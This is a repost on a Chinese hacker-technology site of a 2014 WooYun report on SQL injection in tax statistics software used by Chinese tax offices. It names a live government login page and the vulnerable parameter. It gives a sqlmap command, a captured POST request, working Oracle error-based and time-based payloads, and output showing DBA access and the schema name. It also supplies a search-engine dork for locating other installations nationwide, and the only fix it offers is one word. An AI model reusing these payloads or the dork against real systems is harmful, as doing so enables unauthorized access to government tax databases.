记录黑客技术中优秀的内容, 传播黑客文化,分享黑客技术精华

某通用税务软件SQL注入漏洞

2014-10-08 22:46

统计报表及重点税源管理软件是应用于国家税务总局税收计划、会计统计核算、重点税源管理、大企业税收管理等业务领域的报表管理、数据统计分析平台。整个软件平台由税收计会统报表系统(TRS)、重点税源管理系统(TRAS)、大企业税收管理系统(VICDP)、税收数据分析系统(WTAP)组成。

-------------------------------------------------------------------------



登陆框注入,随便丢了个单引号就爆语句了。。。

http://www.snds.gov.cn:99/i/oem/grpslogin.jsp



aaaa.png



aaa1.png





<code>



直接丢SQLMap里跑就行了,漏洞参数id:



./sqlmap.py -r test.txt -p id --is-dba

<code>



POST /i/oem/grpslogin.jsp HTTP/1.1

Host: www.snds.gov.cn:99

Proxy-Connection: keep-alive

Content-Length: 45

Cache-Control: max-age=0

Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8

Origin: http://www.snds.gov.cn:99

User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.153 Safari/537.36

Content-Type: application/x-www-form-urlencoded

Referer: http://www.snds.gov.cn:99/i/oem/grpslogin.jsp

Accept-Encoding: gzip,deflate,sdch

Accept-Language: zh-CN,zh;q=0.8,en;q=0.6

Cookie: JSESSIONID=2v2nT97LN6ylvDRB2bQTYXSJld6J5Tm2vvT6182H3Z1mG17N6cvF!-141727717



taskGroup=ZDSY&id=aaaa&opid=1&noleft=0&pw=aaa





Place: POST

Parameter: id

Type: error-based

Title: Oracle AND error-based - WHERE or HAVING clause (XMLType)

Payload: taskGroup=ZDSY&id=aaaa' AND 8581=(SELECT UPPER(XMLType(CHR(60)||CHR(58)||CHR(113)||CHR(112)||CHR(113)||CHR(117)||CHR(113)||(SELECT (CASE WHEN (8581=8581) THEN 1 ELSE 0 END) FROM DUAL)||CHR(113)||CHR(104)||CHR(102)||CHR(98)||CHR(113)||CHR(62))) FROM DUAL) AND 'GMad'='GMad&opid=1&noleft=0&pw=aaa



Type: AND/OR time-based blind

Title: Oracle OR time-based blind

Payload: taskGroup=ZDSY&id=-9365' OR 5766=DBMS_PIPE.RECEIVE_MESSAGE(CHR(83)||CHR(78)||CHR(109)||CHR(85),5) AND 'VquD'='VquD&opid=1&noleft=0&pw=aaa

---

[11:33:18] [INFO] the back-end DBMS is Oracle

back-end DBMS: Oracle

[11:33:18] [INFO] testing if current user is DBA

[11:33:22] [WARNING] reflective value(s) found and filtering out

current user is DBA: True

漏洞证明:

GOV的就不去猜表了。

---

[11:42:58] [INFO] the back-end DBMS is Oracle

back-end DBMS: Oracle

[11:42:58] [INFO] fetching current database

[11:42:58] [INFO] resumed: IRPT

[11:42:58] [WARNING] on Oracle you'll need to use schema names for enumeration as the counterpart to database names on other DBMSes

current schema (equivalent to database on Oracle): 'IRPT'





google随便找点吧。(貌似全国都是用的这一家):

inurl:/grpslogin.jsp







修复方案:

过滤。

知识来源: www.wooyun.org/bugs/wooyun-2014-068010

阅读:175019 | 评论:0 | 标签:注入 漏洞

想收藏或者和大家分享这篇好文章→复制链接地址

“某通用税务软件SQL注入漏洞”共有0条留言

发表评论

姓名:

邮箱:

网址:

验证码:

公告

关注公众号hackdig,学习最新黑客技术

推广

工具

标签云